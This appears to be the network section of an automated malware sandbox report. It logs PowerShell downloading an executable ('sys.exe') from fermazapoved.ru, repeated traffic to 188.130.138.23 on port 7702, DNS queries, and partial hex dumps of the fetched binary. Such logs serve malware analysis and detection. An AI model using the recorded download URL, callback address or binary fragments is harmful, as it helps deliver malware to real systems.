                                Aug 14, 2024 22:24:13.702189922 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702207088 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702246904 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702246904 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702301979 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702323914 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702337027 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702374935 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702395916 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702400923 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702414036 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702434063 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702451944 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702470064 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702477932 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702486992 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702517033 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702527046 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702545881 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702564001 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702590942 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702591896 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702645063 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702651024 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702696085 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702792883 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702857971 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.702955961 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.702969074 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703013897 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703031063 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703033924 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703057051 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703079939 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703093052 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703104973 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703154087 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703172922 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703186035 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703198910 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703223944 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703248024 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703249931 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703264952 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703294039 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703298092 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703315973 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703351021 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703397036 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703465939 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703479052 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703516006 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703532934 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703556061 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703569889 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703608990 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703613043 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703641891 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703665018 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703670025 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703685045 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703713894 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703742981 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703792095 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703804016 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703849077 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.703886986 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703947067 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.703952074 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704001904 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704003096 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704051971 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704102039 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704152107 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704271078 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704345942 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704422951 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704497099 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704533100 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704566002 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704596043 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704617023 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704632044 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704674959 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704684019 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704724073 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704782963 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704840899 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704850912 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704899073 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.704910040 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704952002 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.704969883 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705018997 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.705136061 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705147982 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705162048 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705209970 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.705248117 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705288887 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705301046 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705302954 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.705352068 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.705416918 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705429077 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705476046 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.705657005 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705749989 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.705795050 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705859900 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.705893040 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705945015 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.705960989 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.705986977 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.706057072 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.706125975 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.706315041 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.706398010 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.746613979 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.746861935 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.747081041 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.747215033 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.747342110 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.747445107 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.747567892 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.747673035 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.747807980 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.747915030 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.748028040 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.748135090 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.748253107 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.748347044 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.748476028 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.748606920 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.748729944 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.748790979 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.794620037 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.794850111 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.795295954 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.795458078 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.795573950 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.795694113 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.795806885 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.795931101 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.796029091 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.796188116 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.796303034 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.796442032 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.796546936 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.796546936 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.796674967 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.796809912 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.796962976 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.797038078 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.828093052 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.829016924 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.829230070 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.829344034 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.829477072 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.829580069 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.829684019 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.829782963 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.829907894 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.830007076 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.830163956 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.830266953 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.830404997 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.830499887 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.830614090 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.830723047 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.830863953 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.830924034 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.834206104 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.834290981 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.876133919 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.876385927 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.876519918 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.876636028 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.876770973 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.876883030 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.877007961 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.877113104 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.877235889 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.877340078 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.877477884 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.877587080 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.877731085 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.877774000 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:13.894954920 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.895049095 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.895081043 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.895239115 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.895265102 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.895359993 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.895468950 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.895494938 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.895648956 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.895674944 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:13.938926935 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:18.548192024 CEST770249733188.130.138.23192.168.2.4
                                Aug 14, 2024 22:24:18.548343897 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:18.552036047 CEST497337702192.168.2.4188.130.138.23
                                Aug 14, 2024 22:24:18.559789896 CEST770249733188.130.138.23192.168.2.4

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 14, 2024 22:23:42.823411942 CEST6037153192.168.2.41.1.1.1
                                Aug 14, 2024 22:23:42.957814932 CEST53603711.1.1.1192.168.2.4
                                Aug 14, 2024 22:23:54.060560942 CEST5135053192.168.2.41.1.1.1
                                Aug 14, 2024 22:23:54.070303917 CEST53513501.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Aug 14, 2024 22:23:42.823411942 CEST192.168.2.41.1.1.10xe9ffStandard query (0)fermazapoved.ruA (IP address)IN (0x0001)false
                                Aug 14, 2024 22:23:54.060560942 CEST192.168.2.41.1.1.10x1263Standard query (0)174.109.0.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Aug 14, 2024 22:23:42.957814932 CEST1.1.1.1192.168.2.40xe9ffNo error (0)fermazapoved.ru62.173.145.78A (IP address)IN (0x0001)false
                                Aug 14, 2024 22:23:54.070303917 CEST1.1.1.1192.168.2.40x1263Name error (3)174.109.0.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • fermazapoved.ru

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.44973062.173.145.78807332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                Aug 14, 2024 22:23:42.969950914 CEST79OUTGET /images/sys.exe HTTP/1.1
                                Host: fermazapoved.ru
                                Connection: Keep-Alive
                                Aug 14, 2024 22:23:43.673069000 CEST398INHTTP/1.1 301 Moved Permanently
                                Server: nginx/1.12.0
                                Date: Wed, 14 Aug 2024 20:23:43 GMT
                                Content-Type: text/html
                                Content-Length: 185
                                Connection: keep-alive
                                Location: https://fermazapoved.ru/images/sys.exe
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.0</center></body></html>


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.44973162.173.145.784437332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-08-14 20:23:44 UTC79OUTGET /images/sys.exe HTTP/1.1
                                Host: fermazapoved.ru
                                Connection: Keep-Alive
                                2024-08-14 20:23:45 UTC333INHTTP/1.1 200 OK
                                Server: nginx/1.12.0
                                Date: Wed, 14 Aug 2024 20:23:44 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 861184
                                Connection: close
                                Vary: HTTPS
                                Last-Modified: Sat, 10 Aug 2024 20:49:32 GMT
                                ETag: "d2400-61f5a659be39d"
                                Accept-Ranges: bytes
                                X-Content-Type-Options: nosniff
                                X-Frame-Options: SAMEORIGIN
                                2024-08-14 20:23:45 UTC16051INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6f d1 b7 66 00 00 00 00 00 00 00 00 e0 00 2e 00 0b 01 06 00 00 1a 0d 00 00 08 00 00 00 00 00 00 9e 38 0d 00 00 20 00 00 00 40 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELof.8 @@ @
                                2024-08-14 20:23:45 UTC16384INData Raw: 26 df a7 b1 e2 0a 75 f0 d9 24 62 69 cc 36 31 c1 0b 0e b9 69 08 49 49 14 be de a7 1f ea 53 ed 6a 60 da a0 aa 41 f8 22 c2 00 14 7b fb 3c bd d6 12 ad a4 52 6e a2 42 65 c8 5d 69 ff c9 fe 95 a0 6a 63 98 5d 39 78 cd 65 7c 09 8e 32 d9 63 1a 10 d5 c3 04 10 a9 89 f9 7a f6 96 85 c7 c4 4b 26 4a 93 72 05 4b 7e 8e 27 56 e6 69 83 6c c1 ee 90 1c eb 77 c1 64 15 57 14 3f c8 42 9f 53 cc 0f 55 a2 b9 bd 25 74 7b fd 58 dc f9 9f 33 39 0a ad eb 6a f8 ab 72 47 4c b6 68 d8 b5 1b 8d bd 11 5d 0b be 6a ea 41 97 c4 97 5f f7 d1 b1 e7 65 e7 01 fb e3 c0 b8 67 a9 ec ae e5 47 2c fe 2f 8d 22 49 b4 40 e6 98 f6 e5 9a 63 30 d7 44 ff e8 bf 60 ae 9c 7c 64 e7 28 97 a3 ca 07 58 0b 24 66 04 a5 09 fc db 48 82 cd 86 bf 1e c4 65 9c 87 be 91 9b 39 83 7e 60 72 31 bc b6 e3 5b 3d 9b 03 b7 2b f0 f9 65 c4
                                Data Ascii: &u$bi61iIISj`A"{<RnBe]ijc]9xe|2czK&JrK~'VilwdW?BSU%t{X39jrGLh]jA_egG,/"I@c0D`|d(X$fHe9~`r1[=+e
                                2024-08-14 20:23:45 UTC16384INData Raw: f4 af 59 ca 4b 42 7a 82 ad 23 ca a1 4b f1 6c a3 d4 69 d0 4e 51 5b ea 3e a8 f3 f7 1a ae d0 d2 be bc 13 b4 8b 34 e7 d1 5b d6 a5 36 e2 ab 7b 08 32 59 db aa 75 8d d7 76 dc 8e db f1 ed 5b a8 3e 6d 7b 7f cb 2e cc b8 10 34 7f f7 51 ac 86 5a 50 f3 e5 d5 9c 36 6a ea 7d 2c c4 17 86 7b e5 b9 91 d7 47 79 a8 f9 d0 40 7c 37 f6 5c 53 57 c2 20 61 2a 33 af 27 90 b9 ba 05 41 df 34 5f 15 3c 86 17 9c 74 d8 e9 6b e5 ef 0e 69 b2 e1 0a e1 b7 b9 c6 30 b8 34 cc e0 77 d2 a7 3b 23 cd bc 2a 2f 6f a0 9f 52 5f 5e 9f 5e aa 87 9f b8 fa 66 ae 81 23 2e 7e e4 3b cc 24 ea 8a da 17 7d 38 2a dd a2 74 5e 7d 36 d4 0c 09 09 c2 ad db 7d 79 57 91 88 00 a6 ab 35 1d 53 3c 1e fe c1 02 46 5c b9 8f 81 15 55 2f 02 a7 5c 99 f8 21 50 99 07 9a 34 45 27 4a d3 c8 90 9e 6e a5 95 86 e1 de 3a 4b 70 c9 f7 95 06
                                Data Ascii: YKBz#KliNQ[>4[6{2Yuv[>m{.4QZP6j},{Gy@|7\SW a*3'A4_<tki04w;#*/oR_^^f#.~;$}8*t^}6}yW5S<F\U/\!P4E'Jn:Kp
                                2024-08-14 20:23:45 UTC16384INData Raw: 10 3c 4a 07 01 32 04 3e 22 29 64 e2 34 b0 49 66 c5 f9 d8 d8 14 07 a6 99 42 5c 2a f9 05 41 bd c4 ae 4a 47 8d 19 2b 0d 55 e3 11 b1 8a b8 64 6f 40 f5 84 88 ce 96 1c 4f 97 47 67 5e 3d a6 1c 53 98 e3 44 87 af c0 e4 e6 bd e0 2e 27 3f cb cc 9c 71 1a 0f f7 d5 fa 3c 31 2a 1f 10 39 66 40 40 ec a9 3a f7 09 58 e0 91 c0 be 92 a9 91 56 43 6c 21 80 f3 cd f4 38 b9 35 68 74 04 35 ad 6d a1 c3 98 72 e5 e6 65 66 ec 91 38 ea 09 43 f5 f9 fd e4 10 5a 45 8e d5 7d 75 ad ea c4 1e 53 08 bf 41 60 27 fc f6 e0 a8 53 67 af 06 87 8c d2 af 78 81 b1 de 32 d9 ee 9c 6a 83 06 2b 19 39 02 d7 07 11 c3 b1 db a5 b6 a0 75 b7 f7 eb 5e 26 2a bf d8 e8 60 06 47 89 bf 23 3d 60 59 c2 db af 75 ed fd c4 ec 3e aa 64 dd 5c 13 89 20 ba 88 68 f3 fc 97 f3 56 98 c7 36 0a 62 be 6c 9e 69 fa 53 40 f9 07 e7 20 64
                                Data Ascii: <J2>")d4IfB\*AJG+Udo@OGg^=SD.'?q<1*9f@@:XVCl!85ht5mref8CZE}uSA`'Sgx2j+9u^&*`G#=`Yu>d\ hV6bliS@ d
                                2024-08-14 20:23:45 UTC16384INData Raw: 21 24 08 8f f9 bd 1f 22 42 1f bd 58 a2 93 e5 00 0e cc fe f1 13 50 13 94 34 c9 24 9c 77 1c e3 1f 26 ef d5 27 52 92 07 74 d6 ab 8a 0e b8 a3 43 0f f9 bd 80 f1 53 cc 82 a9 cf 5b 64 d4 0e 1d b2 e7 a6 dc 42 f1 69 c5 32 f8 52 1d b2 93 41 b4 54 ef 32 76 4e b0 df e1 07 7d b7 8b d6 7f b2 4d 07 f0 18 b3 2e c5 2e 0f f4 f1 ad 4b 86 67 c7 33 f1 7f db f7 36 31 9a 20 72 0f 41 8e 5a ab 8d 97 c0 42 56 34 f3 50 7b f6 da 35 ec 28 39 88 fe 95 db 56 db f6 92 20 75 6b 83 12 af 83 9c 26 eb bc f4 38 e7 d7 25 52 9d 21 28 87 50 4e 97 ca a3 6e 4d 14 c3 ee c5 65 0e 39 22 f9 eb e8 3d a1 a6 1b 1e 40 4f 28 e3 53 45 3c f5 16 a0 ee 6d df a8 46 ba 13 36 81 ea da 7b ad 0d 74 56 e9 90 02 9d 7b f7 f8 91 2f b6 4c 2b 82 47 21 f4 15 14 19 32 a7 ec cf f7 48 22 dd f9 cb be af c1 30 3a e8 e7 16 5b
                                Data Ascii: !$"BXP4$w&'RtCS[dBi2RAT2vN}M..Kg361 rAZBV4P{5(9V uk&8%R!(PNnMe9"=@O(SE<mF6{tV{/L+G!2H"0:[
                                2024-08-14 20:23:45 UTC16384INData Raw: 68 63 07 20 20 ae c6 6d 85 81 22 60 f9 34 20 c2 ee cb 87 7a bd d4 f9 30 b4 58 98 ab e9 39 28 b1 48 76 56 80 ca 9f e3 78 eb 61 b3 82 4e cb 37 ec 5c 2c cc 7f eb ba 9c 6a ca 81 9c c6 49 0b 87 7b f7 7b 05 55 b4 88 c9 f9 0b 42 dd 33 45 88 a1 6d 8b f5 c5 7e fd e4 ca fe 43 7a 93 5b b1 74 b4 10 c3 8c 35 55 c5 0b 5b c4 63 3f d1 b8 79 ef 76 56 aa de 3a d4 9a 85 89 ab ce c1 52 b8 03 96 f6 34 e9 8c a6 6b 22 a0 dd 0d c4 16 63 04 d2 cc a0 34 e2 13 81 18 e9 ec 84 a4 28 1b 19 ab d9 c5 8f 10 d1 78 da 56 59 6c a9 a3 6b 1a 35 88 46 61 b7 d6 27 43 d6 78 d1 48 c4 49 ae 9a 08 78 06 99 87 7b 45 ff bb 45 5c 46 69 e3 be 5d 76 ac f8 45 cb b6 6b 5a c9 58 8f 3d 02 5f 15 d8 e5 8b d7 fd 06 f5 ad 73 7c 09 43 a5 68 11 0d 42 0a ea 5a 8d 2b 16 ed 28 5c e5 5c a4 56 0c a2 2e 6d b1 0b 3d d7
